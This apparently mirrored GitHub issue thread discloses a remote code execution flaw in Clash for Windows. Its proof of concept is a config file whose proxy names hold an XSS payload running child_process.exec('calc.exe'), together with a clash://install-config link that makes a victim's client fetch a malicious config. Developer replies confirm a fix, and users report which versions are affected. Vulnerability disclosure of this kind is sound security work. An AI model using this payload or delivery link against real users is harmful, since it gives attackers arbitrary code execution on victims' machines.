[Bug]: Remote Code Execution/远程代码执行

Question

[Bug]: Remote Code Execution/远程代码执行

Anthem-whisper opened this issue 2 years ago · comments

Clash For Windows Remote Code Execution

Description

Clash For Windows is powered by Electron. If a XSS payload is in the name of proxies, we can remotely execute any JavaScript code on the victim's computer.

Affected versions of clash_for_windows_pkg

version: 0.19.8 (there are other vulnerability triggers in version 0.19.9, it's exactly 0.19.9)

Platform: Windows

OS specifics: Windows 10

PoC

Import the following clash config file:

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

Switch to it in "Profiles"
Click "Proxies" column (Sometimes it's not necessary.)

Attention:
- You need to make sure that the payload is displayed in the Proxies column.
- Exploit is theoretically stable, but sometimes you may need to restart the clash_for_windows_pkg and reproduce the vulnerability

A way to Exploit

put the evil config file to internets and use clash:// to install it, clash_for_windows_pkg will download and switch to it automaticlly .

such as:

clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE

子凡 commented 2 years ago

right

KonDream commented 2 years ago

0.19.11

wh1sper · Answer 1 · Wed Feb 23 2022 22:55:24 GMT+0800 (China Standard Time)

我已经向作者的iCloud邮箱发送了一封带了PoC的邮件
I have sent an email with the PoC to the author's iCloud mailbox

Fndroid · Answer 2 · Thu Feb 24 2022 10:16:04 GMT+0800 (China Standard Time)

非常感谢，下个版本修复

Fndroid · Answer 3 · Fri Feb 25 2022 11:59:50 GMT+0800 (China Standard Time)

fixed or implement in latest release, check it out from https://github.com/Fndroid/clash_for_windows_pkg/releases

wh1sper · Answer 4 · Fri Feb 25 2022 12:48:45 GMT+0800 (China Standard Time)

okay, I'll make it public now

不想加班劉 · Answer 5 · Fri Feb 25 2022 17:13:11 GMT+0800 (China Standard Time)

@Anthem-whisper 低于0.19.8是否受到影响?

cherry7 · Answer 6 · Fri Feb 25 2022 17:14:07 GMT+0800 (China Standard Time)

Electron框架写代码不开沙盒的屑（doge

yi_Xu · Answer 7 · Fri Feb 25 2022 17:16:53 GMT+0800 (China Standard Time)

~~应该只有 0.19.8 受影响，这个版本才引入的。~~
重新验证了下，0.19.5 是可以复现调用计算器的。

坐和放宽 · Answer 8 · Fri Feb 25 2022 17:19:04 GMT+0800 (China Standard Time)

围观 👀

不想加班劉 · Answer 9 · Fri Feb 25 2022 17:22:28 GMT+0800 (China Standard Time)

锤子低版本都受影响机场直接变鸡场乱杀我查毒去了...

CodeDog · Answer 10 · Fri Feb 25 2022 17:27:45 GMT+0800 (China Standard Time)

吃瓜群众

Fndroid · Answer 11 · Fri Feb 25 2022 17:35:12 GMT+0800 (China Standard Time)

Electron框架写代码不开沙盒的屑（doge

这xss和开不开沙盒有关么你看来，不开沙盒就是垃圾是吗？

双草酸酯 · Answer 12 · Fri Feb 25 2022 17:43:43 GMT+0800 (China Standard Time)

Electron框架写代码不开沙盒的屑（doge

这xss和开不开沙盒有关么你看来，不开沙盒就是垃圾是吗？

https://www.electronjs.org/zh/docs/latest/tutorial/sandbox

……因此，我们建议在大多数非常谨慎的情况下启用渲染器沙盒化。

LztCode · Answer 13 · Fri Feb 25 2022 17:47:43 GMT+0800 (China Standard Time)

测试了0.14和0.18都受到影响，有没有强制更新措施啊

Yanhui Chen · Answer 14 · Fri Feb 25 2022 18:22:13 GMT+0800 (China Standard Time)

3. Click "Proxies" column (Sometimes it's not necessary.)

0.18.8也可以复现

wjl110 · Answer 15 · Fri Feb 25 2022 20:37:35 GMT+0800 (China Standard Time)

谢谢楼主

W33kL1 · Answer 16 · Fri Feb 25 2022 20:39:40 GMT+0800 (China Standard Time)

0.19.2也可以（

Guanglei Xu · Answer 17 · Fri Feb 25 2022 20:46:27 GMT+0800 (China Standard Time)

希望可以发布一个影响范围（版本号范围？）的说明

wh1sper · Answer 18 · Fri Feb 25 2022 20:48:40 GMT+0800 (China Standard Time)

希望可以发布一个影响范围（版本号范围？）的说明

poc里面不是说了吗，小于等于0.19.8都受影响
其他平台因为没有设备就没有测试

ccint3cc · Answer 19 · Fri Feb 25 2022 20:49:07 GMT+0800 (China Standard Time)

更新至0.19.10，测试不受影响

ccint3cc · Answer 20 · Fri Feb 25 2022 20:50:20 GMT+0800 (China Standard Time)

0.19.8，poc测试成功。

Guanglei Xu · Answer 21 · Fri Feb 25 2022 20:50:46 GMT+0800 (China Standard Time)

希望可以发布一个影响范围（版本号范围？）的说明

poc里面不是说了吗，小于等于0.19.8都受影响其他平台因为没有设备就没有测试

感谢

wh1sper · Answer 22 · Fri Feb 25 2022 21:05:42 GMT+0800 (China Standard Time)

希望可以发布一个影响范围（版本号范围？）的说明

poc里面不是说了吗，小于等于0.19.8都受影响其他平台因为没有设备就没有测试

感谢

更正一下，0.19.9版本并没有完全修复，请更新到0.19.10

pipeline · Answer 23 · Sat Feb 26 2022 16:40:25 GMT+0800 (China Standard Time)

感谢，已升级最新版

Steven Yu · Answer 24 · Sat Feb 26 2022 19:50:35 GMT+0800 (China Standard Time)

在现场，贴贴

ahackingboy · Answer 25 · Thu Mar 03 2022 09:07:26 GMT+0800 (China Standard Time)

还好我情报工作OK

malviez · Answer 26 · Fri Mar 04 2022 03:03:05 GMT+0800 (China Standard Time)

感谢，已升级最新版，贴贴

Sunny Bean · Answer 27 · Mon Mar 07 2022 12:35:59 GMT+0800 (China Standard Time)

还在使用 0.11.3 版本 :)

chenxu · Answer 28 · Sun Aug 14 2022 17:48:11 GMT+0800 (China Standard Time)

所以订阅这种就很不靠谱，本质问题没有解决。